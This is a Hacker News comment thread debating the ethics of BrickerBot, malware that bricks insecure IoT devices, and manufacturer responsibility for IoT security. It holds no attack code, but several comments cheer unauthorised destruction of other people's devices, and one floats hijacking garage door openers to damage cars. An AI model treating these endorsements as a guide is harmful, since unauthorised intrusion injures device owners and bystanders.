If someones dishwasher is streaming pirated movies would they care? If their children's bedroom were unknowingly being streamed to pedophiles would the care (obviously they wouldn't like it, but caring requires knowing)?

Vigalantes may be the least worst option.


Meh. This attack is going after the easiest of targets. If a medical device or something critical is victim to this, they should cease to exist. I find it easy to believe that this attack protects far more people in the long run than it will ever hurt right now, and I'm willing to take that side of the moral dilemma.

It would be nice if we could live in a world where we all trust each other, and maybe with physical things this is attainable. But the IoT is a worldwide attack surface. It's open to nefarious actors ranging from junkies with stolen laptops, all the way to state-sponsored hacking organizations with billion dollar budgets. Trust and goodwill aren't options anymore.


Where do you draw the line, I could argue because we know that certain vehicles are remotely hackable we should just disable all the cars without regard to their status of use. Literally 0 difference in argument, yet the results would somehow dictate a different response.


I think this is a legitimate moral paradox. Are you saving more people in the long run by making sure the devices fail sooner rather than later? Not that it's the responsibility of random, unaccountable hackers. But it is someone's responsibility, someone who isn't fixing the problem we know exists.


The thing is, either way, someone is getting harmed. If these devices are left to run unpatched, they'll take part in attacks against whoever, and someone somewhere suffers. Possibly a lot of someones, Mirai wasn't exactly a joke.


wait a fucking minute

people are connecting medical devices to the internet?


If you connect it to a network, it's entirely plausible that there is a path to the internet. Even if it's on an airgapped network, laptops and phones end up on both through accidents...


Or people plugging in USB drives they found outside on ground. Or CD's before that. Or floppy discs before that. ;)


and not just medical devices, but life-support machines running with known security vulnerabilities?

There's nothing inherently wrong with connecting medical devices to the internet, and running an outdated OS on your specialized equipment is fine too as long as it's not being connected to any unsecured networks. But running a known insecure OS on an internet connected life support device has got to be a violation of some law or ethical regulation.


Experience has shown that connecting a device to the open Internet is inherently risky. I'd say any act of connecting a life-support device to the open Internet would have to balance that inherent risk against any supposed benefit such a connection might involve, even if the device manufacture is doing best practices for such a connection.


Don't be too alarmed there are 3/4 classes of device all with differing risk profiles. Patient safety include things like protecting patient information so even systems used to transfer medical records can be regarded as a medical device. Not sure I'd want a pace maker updating online though...


It might not be connected to the internet in an IoT way, but it makes a lot of sense to connect a device to a wi-fi network if you need to wirelessly transmit any form of data.


IoT way? I do not think you can trust traffic to stay local and not leak. This kind of thinking is what got is here.


> until one of those improperly configured devices are a medical device or something critical.

Medical or critical devices should never be exposed to the Internet, especially if badly configured. If there's something illegal involved here is putting lives at risk by not implementing proper security.

If I had to find an analogy, that's like someone hung a grand piano using a shoestring from a roof and the hacker cuts the string letting the piano fall at 4:00 in the morning before it breaks later with much higher probability of killing people. It's still a dangerous and wrong act, but it prevents a much worse one.


To play devil's advocate on that, if there's some super sensitive life support system that's indirectly connected to the internet it's probably going to be turned off until it's actually in use.


To be fair, we don't know that the malware doesn't have a whitelist of devices approved to attack.


The description in the article did imply it's seeking very specific targets.

First, <2,000 devices hit per version? Mirai certainly doesn't show limitations like that.

Second, erases and corrupts? Unless I'm missing my mark, bricking a device that's running on firmware takes a fair bit more targeting than just adding it to a botnet.

edit: Ars has more info: https://arstechnica.com/security/2017/04/brickerbot-the-perm...

Apparently it specifically targets devices open to Mirai, and claims a 2,000,000+ kill count. Not sure what that means for medical gear, but it does mean XP is safe.


Okay but why does a dialysis machine need to be on the internet? Even if it's done to forward reports regarding the usage of the machine that can be done in a daily dump when you swap it out I'm guessing, right? So, it doesn't need to be an always-on device with respect to its NIC. Plus, there's no benefit to the user to have their life giving machinery be online. It's just another thing to overcharge the hospital for all in the false name of productivity.


It is not on the net, but it is on a LAN that has a firewall somewhere that is leaky.

This because it is cheaper in the short run to string a single physical network and then use vlans etc to attempt to keep medical stuff from talking to accounting or the visitors WiFi.

This so a single overworked nurse can monitor a number of patients from a bank of monitors hooked to a thin client near the ward entrance.


Then it seems to me that more nurses and less dependence on fragile technology is a better option. Costs can be economized by many other methods. Labor is something that should be the last thing to pare down.


Technology, done right, can be more reliable than humans.

But in this instance the weighting is one done by beancounters looking at salaries as an ongoing expense, while tech is an investment that pays itself back the longer it can be used without further expences.


If someone has life-sustaining medical equipment on a public network, they have lost their minds. Everything about that is likely subject to privacy regulations of some kind. It would violate best practices of network security with a vengeance.

If someone has life-sustaining medical equipment and they're not maintaining it by ensuring it gets it's patches in a timely fashion, then that right there is where the blame starts. Doing so is no better than ignoring frayed wires on an extension cord.

The real horror is that such poorly designed devices would ever be deployed for such important uses. Things like BrickerBot don't even show up on the same scale.


I experience something akin to this at work all the time. There's the real-world pragmatists and the software purity philosophers.

Tell the family of someone killed that, "____ shouldn't have purchased a device without knowing how to secure it!"


If you want to tug on heartstrings with the "what about medical devices" argument, it's probably just as likely that a mirai botnet will impact a life support or public safety network than that brickerbot will.


Allowing a medical device that can kill or harm someone to be connected to the internet would be a dramatic failure of both the company that produced it and the government. Monitoring is one thing but it better be a one way street or air gapped. No one should be able to do anything to a medical device over the internet besides read information. Or even over a LAN. Even if it is much less convenient or practical.


One could make that argument in a hospital environment, but eventually patients go home. While they're at home, some telemedicine might save their lives. Should we expect e.g. pacemaker patients to know how to set up a VPN? Or maybe you're just saying that pacemakers must be controlled through direct contact only... that's on the device designers then, not on local network admins.


Yes, it should be direct contact. Even short range wireless would make me nervous without guarantees that it was just one way monitoring. I wouldn't blame network administrators for the safety of a device that should have never been on it in the first place.


Tell the family that the device was defective, and the manufacturer is entirely to blame. It's the simple truth, no need to try to blame the deceased.


I agree, we should continue let all the badly configured IoT devices continually be used against the end user. Doing something about it is dangerous and no one likes danger.


Is there any evidence that BrickerBot targets medical devices?


No. In fact there is evidence that it does not specifically target them. However, they belong to a set of devices that may be affected by it.


devices that can kill people have another level of security then random iot devices.


Sadly, they don't. What about a car that has vulnerable software? It's not a medical device but could have a real world effect if the same actions were taken.


> Should


Why would a Dialysis machine even need an internet connection?


Because the sales guy insisted it'd help sales.


This is a more in-depth source for the same story: https://arstechnica.com/security/2017/04/brickerbot-the-perm...


After doing a little research it's worth noting a few key things:

1) This attack is not using 0-days. It's using vulnerabilities that have been in the wild for almost 6 months now, and are so trivial to exploit that some security researchers called the exploits "amaturish". These types of devices have been used to DDoS lots of internet infrastructure. What, short of something like this, is going to get those devices and their manufacturers to secure their hardware, given that Mirai wasn't enough to convince them?

2) I honestly think that finding/making a legal means for this sort of scan (specifically, scanning to check for trivially insecure devices, and bricking them if cannot be patched) to happen on a consistent basis is something that the EFF or the like might want to look into. The problem with a vigilantes is that they lack accountability, so while I might personally approve of the current approach from what I can see (even as I recognize it as illegal), it could take easily take a turn for the worse. I think having a standard around need to survive X number of hours connected to the internet and that a certain number of devices (say 10) need to survive 6/12/18/24 months down the road or face recall would be starting point. There are a lot of contingencies to work out for this, such as personal DIY projects and the like, it's not 100% fleshed out.

3) As far as I can tell, the analogy is more along the lines of a bunch people buying a bunch of stereos and/or loudspeakers that are trivially hackable (but the consumers aren't aware of that), and then putting them everywhere. If those loudspeakers and/or steroes started disturbing the peace, or getting used in ultrasonic attacks on power lines or water mains, you can bet that police would be destroying them, and/or allowing others to do the same.


Uh-oh. Did somebody take my advice? https://news.ycombinator.com/item?id=12612539#12612809


I see a lot of people blaming the manufacturers, or blaming the hacker. Then coming up with analogies to support their point of view. I blame the users and don't feel bad for them at all. The analogy I'm going with is if one of your neighbors bought a canon as a piece of art, and left it pointed at your house. Ignorance is not an excuse.


These users don't think they're buying a cannon, they think they're buying a lightbulb which will mimic the sun or a blender which will automatically make a smoothie for them every morning.


> if somebody launched a car or power tool with a safety feature that failed 9 times out of 10 it would be pulled off the market immediately. I don’t see why dangerously designed IoT devices should be treated any differently

Really? He doesn't see how a car is different from a webcam? And why there are different safety standards for each?

Their goal is laudable, but this seems like a fun way to engage in vandalism while hiding behind an ideological aegis. The sort of thing I'd do when I was 15.


I think he believes Internet-connected devices need at least basic security to reduce damage they can cause other systems. A problem long illustrated in the Windows market and recently IoT.


Slightly OT, but not too long ago I read that it is not uncommon for viruses to remove other known, competing, malware. Does anyone know if anyone has ever made a virus who's only purpose is to remove other malware? Perhaps the same aggressive approach used by Janit0r is needed to stop the spread of worms, kill off botnets etc.?


> Does anyone know if anyone has ever made a virus who's only purpose is to remove other malware?

The first computer virus was an experimental self-replicating program called Creeper.

And the second computer virus was Reaper, a similar program created for the sole purpose of deleting Creeper.

http://corewar.co.uk/creeper.htm


Not only that, but even human immune system can instruct other cells to self-destruct, if it detects they are infected! So what Janit0r is doing is kind of similar to that approach.



Yes, such things exist, but they are still technically malware.

It's a risky approach. It could have unintended consequences. If it's a worm, it could spread out of control and cause considerable harm purely from its transmission.

As attractive an idea as it might be, it's dangerous.


I toyed with a similar idea that would be limited to subnets or non-routable IP space, and open-source/community-driven, but I had to take it down almost immediately due to bad press/backlash. There's really no way to address this without government regulation on ISP's to assume the external cost of botnets coming from devices on their networks. And the only way to justify that is to modify our computer crime laws to allow them to scan, patch, maybe even brick (or just turn off the customer's Internet and notify them) when vulnerable devices are found.


Links to the press? Always interested in how these things are handled.


do you really think it's a good idea to give a badge and a gun to corporate ISPs? that opens the door for so much invasion of privacy.


It takes a special kind of entitled to destroy people's things and to then blame others (the manufacturers) for it.


I think it's rather brilliant. It is the manufacturer's responsibility to ship secure products. Here a consumer with a bricked product will demand a replacement/refund, putting pressure on the manufacturers to not ship shitty products. It's directly applying market pressure to sellers of insecure hardware, and that's a great thing.


> Here a consumer with a bricked product will demand a replacement/refund, putting pressure on the manufacturers to not ship shitty products.

If my shitty DLink camera suddenly stopped working, I wouldn't demand a refund - realistically, I'd just toss it in the bin and try to remember not to buy more DLink products. But I probably still would, if they were sufficiently cheap.

I imagine that calculus is similar for most people.


And DLink will continue to try to save money by releasing products without following proper security procedures because you will keep buying them because they are cheap.

It's tough for security to affect purchasing decisions because it's difficult to measure. I can measure horsepower, megapixels, gigabytes, milliamp-hours, etc. so it's easy to make purchasing decisions based on which of those things are important to me.


I think what you're suggesting is that enough bricked devices will cause consumers to demand security - maybe even some measurable metric, like a certification of external audit - as part of the standard product search.

But I don't think bricking a device necessarily ties into security in people's minds. If they permanently modified it to always show HACKED_BCUZ_DLINK_SUX whenever I try to load the camera feed, sure - but a bricked camera is just a failure. I don't even know if it got hacked, or if a capacitor blew, or if a rodent chewed through something crucial.


Yes. In fact, I'm going to start stealing bikes that have insecure locks.


Please don't. With some funding from China, I'm currently running a massive worldwide operation, which allows me to spy on hundreds of millions of unsuspecting Master Lock users; allowing me to track, among other things, where every bike user is at all time, as well as record what they are doing.

If only it weren't for you meddling kid.

Analogies, aren't they great?

(Since it's apparent that sarcasm can't be read: "Stealing bikes" isn't the same bloody thing. Why even make that analogy?)


If this danger is real, isn't it best to inform the consumer, or perhaps use a lawsuit to force a recall, rather than destroying other people's hardware?

Does this concept apply to software? When the next large-scale RCE 0-day drops, does it make sense to use exploitation to destroy as much as possible in order to pressure the developers to ship a secure product? Since, the hacked machines certainly could allow an attacker lateral movement to sensitive data.


a lawsuit requires people 'smart' enough to even know they were hacked, and for a recall they need to decide if the cost of a recall is cheaper than legal/settlement fees, ( i learned this from Fight club) lol -- however -- WARRANTY replacements of devices because a hacker breached security and bricked it--this could be a LOT faster way to force them to recall.


>isn't it best to inform the consumer,

How, like 5% of people that buy electronics actually turn in the warranty cards. No, they will sit on the shelf for years polluting the internet with DDOS attacks and spam.

>es it make sense to use exploitation to destroy as much as possible in order to pressure the developers to ship a secure product?

Yes. That is also why I backup data using multiple methods including off line ones.

Vigilante or blackhat doesn't matter. The next RCE will gladly spit copies of CryptoLocker everywhere if they could get ahold of it.

The internet is a dangerous and well connected place. If lived China, I would think it's funny if I wiped a few large US corporations off the map because they used a DLINK webcam. And there is only a tiny chance in hell they would ever find me.


There's a few things missing in this comparison, most notably the bike manufacturer isn't claiming the bike is already secure ("auto-locking" bikes) or making additional security challenging (bikes that locks are very hard to install on) or generally profiting from an environment of misinformation about bike theft and bike safety.

Additionally theft of property has a personal gain for you.

I'm not sure I ethically support the hacker's actions, but I don't think the bike example has the market/awareness effects that make it at all defensible.


What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

What's the problem with these people?

Sarcasm aside, I live in Brazil, ask any Brazilian who stayed on an European country what was the biggest difference: "I could feel safe anytime, without worrying about my stuff".

That really shapes the mind and behaviour of people.


Which is great, in theory. But devices in Europe are just as accessible to Brazilians as they are to anyone else. Unless a device is locked down to local access, you can't have "safe neighborhoods".


> What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

Isn't this actually a really common sentiment, though? I've lived in several places where leaving a bike unlocked for 5 minutes, or sloppily locked for an hour, means you're going to lose it.

That doesn't make the theft acceptable, but if a friend borrowed your bike and left it unlocked you'd still get mad at them.

Reshaping society so this stuff doesn't happen is great, but on an inside-view level we treat crime as sort of an inevitable "someone will do it" force.


> Reshaping society so this stuff doesn't happen is great, but on an inside-view level we treat crime as sort of an inevitable "someone will do it" force.

I don't disagree with you, however I think there are some levels to this concept, e.g. how two different locations would differ if it was: a lost wallet, a somewhat clear opportunity for embezzlement, a bike stopped in front of a coffee shop?


You may get the exact same answer from a European who has lived in Japan.


>What kind of stupid person would think that we could have a cooperative, functional society where I can just be careless with my bike, right?

The same kind of stupid person that doesn't realize they live in a ghetto called "The Internet".


Having a bad lock on your bike generally doesn't cause much harm to others. Allowing your hardware to be used for, e.g., DDOS attacks does.


I understand what you're implying, but no one is "allowing" their hardware to be used criminally. At least in the U.S., our personal property system is permissive i/e you may not use my things without permission. So, using an IoT device as provided by the manufacturer is "allowing" its misuse so much as leaving my backyard gate unlocked is "allowing" criminals to park their stolen goods in my backyard.


Ok, but we do have "attractive nuisance" laws. If you leave out a trampoline next to barbed wire, you can be accountable even if you didn't actually permit anyone to use it.

This actually seems much closer to the IoT issue than theft. The maker and user of the device have created an inviting target which will cause harm to someone other than themselves. Even if the eventual attack is illegal, they can still be held accountable for making it so likely.


Honestly, I've never heard of a law like that. The U.S. is a big place; whereas that may be the case in parts of the country, in the south where I'm from, that's never become known to me, especially in the rural areas where I grew up. Instead, the people using your things without permission are at the very least trespassing.


IANAL, and I can't find a definitive statement of where the doctrine applies, but I see it referenced in cases in many US southern states (AL, GA, AR, KY, FL, TX). I know that the particulars vary in many states, based on precedent and statute, but I'm not aware of anywhere it's absent entirely. Hopefully someone more knowledgeable will come along and clarify.

Note that "attractive nuisance" is specifically about trespassing children.

https://en.wikipedia.org/wiki/Attractive_nuisance_doctrine


It's a very well entrenched common law concept. The same goes for swimming pools: if you build a swimming pool and don't put an adequate fence around it, and a kid comes by, jumps in and drowns, you're probably going to be found liable (not criminally, but you can be successfully sued for it)


The only attractive nuisance laws I've heard of applied to children. If you have a swimming pool without a fence, and a child sneaks onto your property and drowns you are liable.

IANAL, and it's hear say, but I had thought this was something everyone knew.


A poor choice of words on my part. That aside, the point remains: poorly secured IoT devices cause real harm to others in a way that a poorly secured bike does not.


That market pressure already exists, and what do you know, the market strongly favors certain locks directly because of that pressure.


Very different. If you can bust an insecure lock you can steal a bike. If you bust an insecure IoT device, you can steal data from potentially thousands or millions of people.


Not only that but use it as a botnet to make it so the entire internet becomes unusable.


I am not sure this is a good analogy. Stealing a bike only effects one person. an IoT device that brings down the internet in a DDOS attack impacts everyone.


Well, the manufacturer provided lock is a piece of string connected to an index card that says "do not open", and the bikes are being regularly used in crimes against the public at large.

Given the owner of the bike could conceivably be held liable for the use of their bike to commit crimes, the janit0r who decided to clean up this crap comes across as the lesser of two evils.


I feel like a more accurate analogy is that you are going to start breaking into poorly secured garages and destroy people's bikes so that the owner can't ride them anymore.


While I am on the fence with a lot of what is happening, I would have thought a more appropriate analogy would be to: Break into a poorly secured garage, that has been sold as a single unit to the customer, seal the door and any other access via welding so that no one can ever use the garage ever again.


No. The product is going to be out of warranty, the manufacturer is going to refuse to replace the device, and suddenly a customer is out hundreds or thousands of dollars out of their own pocket. IoT devices are not cheap.

I find it reprehensible that the Gizmodo author (who is using his position as a journalist to encourage criminals) and HN commenters are applauding this hacker as if he's a hero of the people, fighting for a better future. He's directly harming individuals who have purchased products. This is not a friendly reminder to manufacturers to get their shit together. It's some guy illegally connecting to, taking control of, and bricking computers.

I've seen him referred to as a greyhat. No. Everything about this is strictly blackhat. This hacker deserves prison time. What a piece of lowlife scum. It really does sound like a 15 year old getting off on making waves, rather than someone who gives a damn about security.


Yeah, it's a force to be reckoned with, but that does not mean it's ethical.


How are the manufacturers not to blame? One way or another, these devices are getting hacked. Only most of the time, they're taking down Playstation Network or GitHub rather than being bricked.

Attacks on devices that have hardcoded weak credentials online aren't an event or an act. They're a force of nature, like erosion. No-one would be happy with someone building bridges that don't account for erosion. Nor is it ok to ship something that connects to the internet and doesn't account for the millions of automated bots that are prowling the web 24/7 looking for insecure devices.

The manufacturers are 100% to blame, and the worst thing is that they're not the ones that deal with the fall-out – innocent companies and consumers are.


It's sort of like your neighbor having an automated lawnmower, and you knowing that with a careful placement of rocks the image recognition will fritz and it will happily start mowing into your yard, over your petunias and possibly your small children and animals. You're fairly certain that there are other problems with it you don't know about as well.

Do you force the situation and make it mow into your yard and over a bunch of rocks to destroy it, or do you live with the danger?

I don't have an answer. In this situation you could at least talk to your neighbor. Without the ability to feasibly do that, I'm not sure I would fault either action.


Think about it. If you have kids or pets or flowers, seems like it would be prudent trigger the event in a more safe, and known environment than to leave to chance (of injury to property or 3rd party). Seems like talking to the neighbor happened over a decade ago to me.


Sure, depending on the chances of it happening. The problem is that we don't know what the chances are, and as a species we're fairly bad at assessing stuff like that in general. If it's a million-to-one chance, there are probably plenty of other more worthy perils to be concerned with first. If it's a hundred-to-one chance, it may be an imminent threat. Which is it? How do you trust that the person telling you the odds isn't vastly over or under estimating the chances?

The answer falls into an area that's somewhat unknowable with current information, which is why I can't fault either behavior.


I disagree. We know that the probability of it happening again is very high, seeing as it has already happened multiple times, and no serious action has been taken to improve the situation. If we were speculating about a theoretical risk, I would agree with you.


I think the issue is less the chance of the lawnmower going wild by itself (because screw that, I don't care how small the chance is, it's not acceptable), and more the chance of the lawnmower exploding, taking out your eye when you trigger it's failure it yourself.

As in, "the chance of getting hacked" < "the chance of the vigilante creating dangerous situations".


It takes a special kind of entitlement to put internet-connected devices on the market that basically have no security.


This statement and others like it here seem to assume that the hacker has not been directly affected by the infected devices.

For example, maybe this person had a wife dying of cancer while Mirai destroyed his life's work, so in the same period he lost his wife and he lost his work.

Or, maybe he spent a lot of money trying to launch a new product through channels that were destroyed during one of the attacks, and unable to get his money back, had to close the venture.

Maybe he had to sleep in a data center for several months during the holidays and concluded the only reason he was doing this is because consumers and manufacturers aren't concerned with the damage they are doing, so he is going to make them become concerned about the damage they are doing.

The point is that we have no idea if this person has been harmed, and whether they have any other legitimate means of being made whole from harm done, as well as be able to protect themselves from future harm.

Clearly, the proposed solutions coming from industry "experts" is likely to make things worse, as the only other activities to "fight" Mirai seem to be to support legislation as a solution to a technical problem, and I'm really not clear on when this has ever worked, especially in a system that everything on the planet can connect to.


> It takes a special kind of entitled to destroy people's things and to then blame others (the manufacturers) for it.

If you put a dangerous, unsecure device, live on the Internet, that can be used to attack other machines, you deserve to have your property be destroyed.


"Something Wonderful has Happened"

https://en.wikipedia.org/wiki/SCA_(computer_virus)


As someone who works as a software consultant for many IoT and connected device companies, how can I increase my understanding of IoT security? How can I ensure the devices I work with are secure?


Since posting this, I did some research, and it looks like the biggest security problem (currently) is manufacturers hardcoding default passwords into the firmware. Here I am thinking I need to become an expert in security to help my clients secure their devices, but is it really as simple as encouraging clients to set secure, default passwords?


Unique passwords for each device, some form of auto-updating so the OS and any webservers don't get too old and making sure the developers know about the OWASP Top 10 should go a long way to making the devices secure.

Anything else would be dependent on what the device is for and how it does it.


The MIT has a pretty good online class about security.

https://ocw.mit.edu/courses/electrical-engineering-and-compu...


That's terrible but also kind of awesome. Remember, these things are unsecured and they're going to get owned anyway, it's just a matter of time. That doesn't make this right, but it is important context to keep in mind.


The writer of the story really tries hard to make vigelante justice narrative and glorify someone who is causing real damage to computer systems. We saw the same thing with the hack of Ashley Madison . They make the original vendors out to be scumbags. Things are much more complicated . Yes vendors and websites should keep things more secure. If you really want iot to be more secure I don't believe that large or small hacks is the best way to do this. The consumer is really the one that loses here.


Well, yea, thats half the point. The point is manufacturers can't be bothered because it doesn't hurt them. There isn't a way to hurt them short of lawsuit or legislation. We don't really have the standing or power to effect change, so they hurt the consumers who complain to the manufacturers. Nobody thinks this is a nice solution, but is there a better alternative?


It's what I said people should do. Kind of like 2nd Amendment taken against 3rd-party devices that nobody will do anything about. It might also generate demand for more secure devices on consumer side or liability on supplier side for same. Good to see someone is doing it. There were quite a few other people wanting to see these bricked on last HN thread about it:

https://news.ycombinator.com/item?id=12771067


It's simple for manufacturers to make their devices secure from corruption. Put the firmware in ROM. Malware will not survive rebooting the device.

If you really must be able to update the firmware, add a physical "write enable" switch, not a software enabled one.


The method they're describing is only permanent for devices without a removable startup disk, right? If they run this on my raspberry pi, for example, just reformatting the sd card and following the same process as when I first got it should immediately fix this.


Yes, it makes every effort to corrupt the filesystem that the operating system is stored on and mess up the networking before shutting down the device or rebooting. If the device has its' OS on readonly media then this won't do much. Maybe it will turn off until someone cycles it. If you can reformat or reflash the disk then you can recover. For a raspberry pi that's cool. For an IP camera it's generally a problem.


This is perhaps the only way. Get the customer to irritate security exploits.

Nice thinking though


I am fascinated by the somewhat Darwinian trajectory that this might take. Let's project forward ten or twenty year to when that smart lighbulb has the computing power of 1990s era supercomputer. Might all the lighbulbs in my neighborhood form an intelligent swarm? Will the be engaged in inter-swarm battles? It's not like there's an "off" button. Has any good sci-fi explored this topic?


Didn't a grey hat similarly flash a ton of old routers following heartbleed? Search isn't providing results atm, but I do recall an uptick in retail routers failing post HB news wave, with little mentioned as to the "why". If memory serves, it didn't "brick" them, it broke DHCP(no longer assigned dynamic addressing; WAN or LAN).


Shouldn't be so merciful to brick it. Should have taken over some garage door openers, measured the average time between open and closing, and then close it suddenly after t == t_Signal+(t_Average)*1/3. Security is when your door is not trying to get into your car. The carcrackodile would raise awareness.


Is this how we solve security? An army of white botnets in a never ending war with an army of black botnets?


Can somebody add "brickerbot author" to the title to have at least a bit of information.


Thanks, we did update the title from the original “This Hacker Is My New Hero”.


Actual article title: "This Hacker Is My New Hero"




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: